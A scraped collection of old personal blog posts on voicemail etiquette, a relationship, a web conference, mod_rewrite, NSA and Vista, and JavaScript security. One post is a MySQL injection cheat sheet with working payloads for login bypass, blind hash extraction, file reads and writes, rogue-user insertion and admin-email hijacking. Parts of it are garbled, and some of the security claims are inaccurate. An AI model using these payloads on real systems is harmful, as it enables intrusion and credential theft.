Three weeks ago I found myself standing outside my garage, recording a new voice-mailbox greeting on my mobile phone. Upon recording the new message, callers who were not fortunate enough for me to answer their call were greeted with, “Voice mails with no substance absolutely stink! So, if you don’t have a message — just go ahead and hang up. Otherwise, leave your message after the tone or I will see your missed call and try to call you back.”

Why so harsh?

The purpose of voice mail in my opinion: capture the telephone calls from people who actually require attention. Verbal messages are left accordingly, providing the recipient with a message to identify the caller, their issue and a means for which the recipient can return their call. Do you have any idea how annoying it is to receive a notification, “New Voice Message from ###-###-####,” just to call your mailbox and discover it is an individual saying, “Hey, hit me up!” I find that extremely irritating. Obviously I will see the missed call and try to return it.

How this relates to me..

Honestly, my friends and family know that I am pretty freaking bad about returning telephone calls. I am 10 times more likely to return your electronic correspondance(s) such as email and instant messages, prior to ever returning a phone call. Sometimes I get so irritated by people on the other end of such telephone calls that I opt to skip the live conversation all-together and just put myself straight into their voice mailbox. This makes it easy; avoid the annoying.

Too bad I am not experiencing this conflict with only my mobile calls. I have the same annoying scenario and complaints with messages from clients and messages at home. Callers phone my number and leave messages that are so broad and weak with useful information that I get irritated just listening to them. “Justin, this is John Doe, give me a call back please.” Would it really hurt to leave a little more information surrounding the topic of what your call is about John Doe?

As an example of what I consider to be a useful, to the point and helpful voice message:

Good morning, my name is Justin Shattuck and I am calling from Tulsa, Oklahoma. My call concerns the 72″ custom printed static adhesive wall-cling offered on your website, whatever-it-was.com. If I were to provide my artwork cropped and extracted from the background, could you possibly print and overnight the printed materials to me so I could receive no later than Friday, February 2. If you could follow-up with me by telephone at ###-###-####. I appreciate your efforts in advance. Once again my name is Justin Shattuck, interested in 72″ wall-cling, ###-###-####.

Now maybe that is a bit overboard, although it is how I leave voice messages. Straight to the point and usually as accurate as I can possibly be, unless I am intentionally trying to be broad and mysterious with the topic. I’m not saying that everyones’ voice messages are horrible and of under-par quality in substance; just most. I would like to check my voice-mailox and distinguish immediately a call that needs to be immediately returned or those that could wait until my attention is undivided.

The necessary elements

1. Caller Name: including the name of any individual, party, organization or company being represented by the caller. If caller is associated with a specific organization, party or company, their name should be included as well.
2. Subject of Call: Exactly what the message is concerning, as concise and short as possible while still delivering the required details to the recipient. Message content should consider objective questioning that could be assessed by the recipient.
   

   Imagine if the caller actually picked up the call, what would you ask, what would they ask and how would you answer it? Deliver responses to these questions within your voice message, giving the recipient a heads-up as to your reasons for calling.

3. Contact Information: Give the recipient of your voice message the best method(s) for contacting you. No one enjoys phone tag. Such games get frustrating for both sides of the communication line and eventually someone is going to give up. If you believe that there is a slight possibility that you are going to be unable to receive a call on your primary medium of communication; leave the recipient an alternative, such as: email, fascmile or a mobile phone.
4. Speak Clearly: Ensure your statement is clear and comprehensible. Voice messages are capable of becoming flagrant crimes of nuisance when individuals mumble their words, speak in extremely high pitched tones or whishpher their messages. Be heard! You are calling for a purpose, make sure the recipient can hear it.
5. Verbal Tempo: When you speak, make sure your words are spaced out evenly. There is something very irritating about a voicemail message that seems to more-or-less be fluid, and not the fluid we prefer, fluid as in all the words wash together to make one constant sound. Its really very irritating..
6. Reference Previous Conversation: Leave details and information related to any previous conversations regarding your current message. Whether between you and the recipient, the recipient and another individual or another individual and yourself.
7. Referred By: If you were referred to this organization, individual or company, tell them by who. Sometimes this could score you a quicker call back, especially if the company has a great report with the referring individual. However, it could have some cons too — just hope your buddy didn’t stiff them somehow!

The above mentioned outline is simply my suggestion, a modest recommendation to leave the significant details everytime you leave a message within someone’s voice-mailbox. Give it a whirl, find yourself delivering useful, informative messages that are full of substance and reason. The recipient on the other end is sure to be happier because the more we know the more comfortable we are.

If you know why someone is calling, you’re more likely to return their call. At least I know I am. Write em down, memorize them, paint them on your refridgerator; I don’t care — just give it a try and let me know if you think they are worthy of your use.

Disclaimer

If you call me… you better utilize them! They are my guidelines to a successful call back from Justin Shattuck!

Personable content is something that seems to have started lacking from my website. Over time I have found myself writing less and less about my personal endeavors, relationships and adventures; focusing primarily on business, projects and technology. However, it is time for you, my loyal visiting crowd to put your minds at ease with a little personal life of Justin Shattuck rehabilitation 101.

First, I apologize to those visitors who are friends and anticipate updates on my present day activities and life. I’m positive I have bored you with tales of scripting and a vast array of techy gobble-de-gook content. In a sense, this update should cover just about all the topics you might be curious about.

Following Christmas I entered into a relationship with a beautiful, caring and absolutely uber-awesome girl named Kimberly. She provides me with every element in life that I require to be happy, a cold environment, crushed chips under the door while I work and the occasional lashing with a stiff switch. Just kidding. This girl is the epitome of wonderful. Beginning with her birthday, followed by weeks of wonderful days and perfect evenings, we found ourselves inseperable.

Initially, when I asked her out on a date, she denied my request and told me we should just chill. That is exactly what we did. We chilled so much that we found ourselves wrapped up in one anothers arms, trying to stay warm. She gets cold very easily and I get warm very easily, therefore, we have a nice medium between us that levels it out.

There are tons of reasons as to why we care and love one another so much; despite the refreshing personality one another brings to the table. We’ve both been in similar situations, enjoy very similar activities and share important interests. We have known of one another for quite a long time, however, we never really spoke or tried to get to know one another. We are in a very comfortable relationship and honestly, it feels freaking great.

Besides my uber new relationship, I have numerous new ventures in which I am taking on. In the last two weeks I have decided to purchase two new websites that are going to be built upon over the next two months. These two web properties are merging, under my excellent leadership into one elite website. The details for this project will soon follow; time providing.

I’ve been working extremely hard on various other projects, including my map data project for mobile gps and various backend projects for clients. I’m planning to release a few new plugins very soon amongst the Wordpress community and possibly finish up my previous Wordpress theme, version 3, for public release in early March.

All things considered, life is treating me very well. Between the projects that will keep me busy through mid-April and the fact that I finally have a refreshing, loving, caring and extremely-addicting girlfriend, Kimberly, I must admit, I am doing pretty great. Hopefully you are too.

In nearly two weeks, I will be calling Vancouver, British Columbia, Canada home for roughly a week. Why? To attend, Web Directions North, a conference hosted by various designers and developers that influence my day to day thought process on design, interaction and development.

Attending the conference plus the additional workshops is something I have been looking forward to for quite some time. I am totally pumped about the experience and listening to these guys (and girls) and what they have to say relating to design and the like. I’m hoping to be able to post some articles and such about the experience and what exactly is being talked about.

If you’re going to Vancouver for the event and you want to share a hotel room, I am totally game for splitting up a room with someone. As long as you don’t jack my posessions, snore louder than me or try to touch me inappropriately. Okay, that about covers all the bases — hit me up via my contact page if you think you would like to split a room.

See you in Vancouver!

A small yet handy cheat sheet for mod_rewrite. The most used items to build a mod_rewrite pattern.

Despite the tons of examples and docs, mod_rewrite is voodoo. Damned cool voodoo, but still voodoo.

Layout

RewriteRule Pattern Substituion [Flag(s)]

Example of rewriting oldfiles to new files:

RewriteRule &/oldfile\.html$ /newfile.html

Operators

.	Every char
< > =	Compare
\	Escape a char
.+	One more, more chars
.*	No chars or multiple chars
^	Start
$	End
(…)	Group
a|b	.A or B
(a|b)	.A or B group
a{5}	Exact 5 times a
a{1,5}	Between 1 and 5 times a
[a-z]*	Match chars
-d	Directory
-f	File
-l	Symbolic link

Flags

[NC]	No case sensitive
[OR]	Allows multiple lines
[R=#]	Redirect where # is number: 404.
[L]	Terminate routine

RewriteCond variables

%{HTTP_ACCEPT}	Media types accepted by the client, ?text/plain?
%{HTTP_COOKIE}	Cookies set for the client.
%{HTTP_HOST}	Domain name of the virtual host queried.
%{HTTP_REFERER}	Page with a link to this page (can be omitted).
%{HTTP_USER_AGENT}	Client, such as ?Mozilla/4.0?
%{QUERY_STRING}	Query string transferred by a GET form.
%{REMOTE_ADDR}	Client IP address.
%{REMOTE_HOST}	Domain name of client.
%{REMOTE_USER}	User name of the client.
%{REQUEST_URI}	The URI requested by the client.
%{REQUEST_FILENAME}	The corresponding file on the local file system.
%{SERVER_ADDR}	Server IP

MySQL Injection Cheat Sheet

Basics.

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

Note: You must specify a new file, it may not exist! and give the correct
pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"
に関する追加情報：

the above chars are Chinese Big5

Advanced Vectors

Using an HEX encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = ‘root’, pass = ‘root’

Bypass:

insert into login set user = 0×726F6F74, pass = 0×726F6F74

How to determin the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add:

0x

before it.

Over the past five days, my website has been listed on various gallery websites, delivering opinions and praise to its glorious design. I am especially pleased with the traffic and overall positive opinions following the listings on such websites, as one must expect.

Shane @ unmatchedstyle.com said:

I’m virtually positive that Justin Shattuck’s WordPress Blog is my new #1 favorite design. Good grief this thing is nice. First of all, this is the Holy Grail for me…

Sites that like me…

• Smashing Magazine
• Digg
• CSS Mania
• CSS Galleries
• Light on Dark
• Screen Fluent
• Screenalicious
• CSS Remix
• Most Inspired
• CSS Container

The downfall..

Is it possible to measure the success of ones web blog design or theme based merely on the amount of times it has been ripped? I’ve noticed three instances in which version four of my website has been ripped. Personally, it sucks! I think it is lame and disrespectful, however, I guess I should be flattered. The design is superb and obviously people like it — otherwise they wouldn’t want to be like me.

So, if you are thinking about ripping off my site, why don’t you wait. I’ll release something similar for your pansy butts to use. Be respectful of ones hard work, dedication and the like; find something else!

Finding yourself lonely late at night? Fiending for the next wonderful update from yours truly? Wonderful! In the mean time, you don’t have to visit every day to get that wonderful content. Simply subscribe! On every page of my website is a button on the top right of the navigation panel that says Subscribe to RSS, click it and subscribe a way. If you’re unsure what syndication and subscriptions are, read the syndication page.

I want more subscribers, so I am asking — subscribe!

For my returning visitors, you might notice thats the direction of this website is beginning to broaden and cover a few additional topics outside of my existing entertaining life. I’ve been monitoring the search terms and success of my web traffic and now feel as though I am in a position in which I can speak about my opinions on a variety of subjects.

Therefore, I am going to begin writing articles surrounding security, programming, user interaction, and a few other areas, excluding the ever-hated politics and religion. I’m going to devote as much time as I possibly can to my blog and the routine of writing articles regularly and updating with unique, concise content.

As a visitor I am going to solicit the opinions, suggestions and feedback elements of your brains to assist me in creating more content for you to enjoy. If you feel my writing style is awkward, well keep it to yourself. I’m not going to dumb down my content or knowledge for the complete newb, however, I would like to cover areas of technology and offer up useful experience to those who are a little behind my expertise. Sound good?

Wonderful! Thats that, I hope you enjoy the new JustinShattuck dot com, I’ve noticed that the CSS galleries are praising the new design and I am really pleased with the resulting traffic from the new design, year and content! Good night!

As a government security agency, what company would capture your interest the most in terms of eavesdropping on the most potential threats? Microsoft currently carries more than 90 percent of the market for its operating system Windows, which the NSA believes to be in its favor.

For Windows Vista Security, Microsoft Calls in the Pros was published late last week on the Washington Post and honestly, I am a bit uneasy about the entire call Microsoft made to the NSA.

Why am I uneasy about this? A company that produces software for 600 million users is currently unable to provide security itself, therefore they are recruiting the assistance of a well-known government security agency. If they can’t secure their operating system themselves, who says they’re protecting their users from the known habits of the NSA?

Who is going to keep the NSA from incorporating a rootkit, eavesdropping daemon, and the like? Granted the NSA is helping itself out because they utilize Microsoft products and services, however, on the same note; why would a company want to utilize such software that can’t be maintained by its vendor?

Evaluate this awful loop and take into mind these possibilities…

1. NSA developers and engineers are so smart; why not utilize an operating system developed soley for their needs? I understand not re-inventing the wheel, yet they are utilizing an operating system they’re securing and branding with their seal of approval per se.
2. Hypocrite? I believe so, the NSA is supposedly going to secure this operating system and label it as such. Therefore, aren’t they biting the bullet when it comes to eavesdropping and monitoring terrorists or threats utilizing such aforementioned NSA secured and approved operating system?
3. There has to be NSA planted back doors in it..

Call me paranoid, take me seriously; I’m being realistic! The United States NSA employs some of the smartest engineers, developers, scientists and mathematics minds on the planet. However, they are not operating system creators, thus, makes me curious who actually developed and built Echelon.

Sitting amongst us all, every moment of every day, rests a trojan that has been neglected for as long as I can recall. It quietly lay dormant waiting for the opportune moment to rise up and cause havoc across the globe. Over the last six years it rarely has shown its face to anyone; except those who poke and prod to prove its capability. However, with the rise of Web 2.0, the ugly head of this trojan turns and is gradually rising.

The horror I mention is dubbed, Javascript. The language in which internet users have come to admire and consider a mere toy to add a little extra pop or spice to their internet applications and websites. Our internet browsers rely on this language and there is no way to turn back from it now. Over the years the language has been accepted as a vital member of our internet community and is often worshiped. It receives large amounts of praise from its blood brother: Ajax.

The true nature of these languages are beginning to write tales of horror as they begin to become obvious. We have allowed these languages to penetrate our computers, laughing at our ignorance for allowing a stateless protocol infect us with it; HTTP.

Netscape Communications Corporation’s implementation of the ECMAScript standard was named Javascript, based on the concept of prototype-based scripting languages. The language is best known and witnessed for its implementation within websites, known as client-side Javascript, designed primarily by Brendan Eich, however, also enabling scripting access to objects embedded within other applications. Javascript is designed to execute arbitrary server provided code on a client computer. It has been given permission to bypass many barriers and execute nearly anything imagineable on a client.

Content creation should not be recondite. It should not be this bizarre arcana that only experts and gold-plated computer science gurus can do.

Brendan Eich, Innovators of the Net, primary designer of JavaScript.

May I say wrong? Absolutely! Personally, I completely disagree with Brendan’s statement, a programming language should be simplified, thereby its security follows suit. The so-called experts knew of the dangers long before and are now witnessing as users fall in the realm of insecure applications. We are now utilizing cross-site scripting and javascript shells which are slowly taking over our computers. No lessons learned and all bullshit aside; security’s biggest nemesis is the usability of it. A secure system is extremely difficult to manage, there is a good reason for it; security deals with a large amount of complexity and obscurity which cannot be put into practice with simplicity in mind. It simply implies, to secure your computer, integrate with a firewall to control access.

Getting through the city gates

Imagine for a moment, a language in which was permitted to freely travel through the gates of your computer; travel without question through your firewall. What if someone developed such a language in C, would we have any objections? Obviously not, it was created and we know it as Javascript. Javascript is permitted to travel through the firewall and executed on your local computer by all internet browsers. It is allowed to execute and send data back to remote servers through the HTTP protocol stream. Ajax is the new trojan, in plain view and very strong. Java, the virtual machine, acts as a sandbox for code to be executed, however, Javascript has none. Javascript is allowed to pass through because of our permissions. Ajax isn’t less secure than Javascript, it relies on Javascript.

Javascript is not a toy, respect it..

Javascript has been treated as a toy language for years. Mistaking this language as nothing more than a quick enhancement to HTML for web pages. It was typically utilized to add popups, interactive functionality and even effects to boring sites. Most have ignored the power behind Javascript, most are still oblivious to its strength. With power comes responsibility and inherently exploiting and vulnerabilities is born. I feel as though Javascript is not a toy language and we should stray from these ideas and face the facts about the language. Cross-site scripting opened a whole new world for vulnerabilities. Giving malicious hackers backdoor access to your computer and honestly the opportunity to own your computer. Disabling Javascript could be a quick fix, however, most websites require Javascript to be enabled to enhance the viewing of their particular pages. Online banking systems, social networking, and web mail interfaces all utlize Javascript and who wants to miss the beloved pop-up windows?

Aftermath:

As the internet evolves, especially with Web 2.0 really taking off. A new generation of internet applications and enhancements are being made. These applications are going to take Javascript, especially Ajax to a new level. It will begin to flourish like we have never thought possible. Real-time content fetching, less browser refreshing; almost as if our clients are becoming more and more dependant upon remote servers. They’re beginning to grow closer and closer together, nearly attaching themselves to one another for operation. Until, at some point everything breaks, fails and falls to the conclusion thats Javascript is dangerous.

My prediction and conclusion..

I feel as though the situation cannot be avoided. We have attached ourselves, our browsers and our applications around the concepts provided from Javascript. It is a little too late to drop the beloved language in which our websites depend upon so much. The trojan is amongst us, breathing and evolving with our workstations, applications and community. We must embrace the trojan and live beside it, treat it with extreme care and occasionally provide a little dance to praise the wonderful features it adds.

Browser producers should develop new security techniques and implement technologies to provide a sort of sandbox for Javascript code to be executed within before it is allowed onto the local file system. It is up to our browser counter-parts to not allow Javascript to become the worst trojan we know. A sandbox, virtual machine would prevent Javascript from becoming a logical bomb, destroying all that we have built.

2007 will bring about the real aftermath. Personally, with Web 2.0 being as big as it is, I am going to sit back and watch the show. Hopefully there won’t be fireworks caused by harm but celebration for our new advances.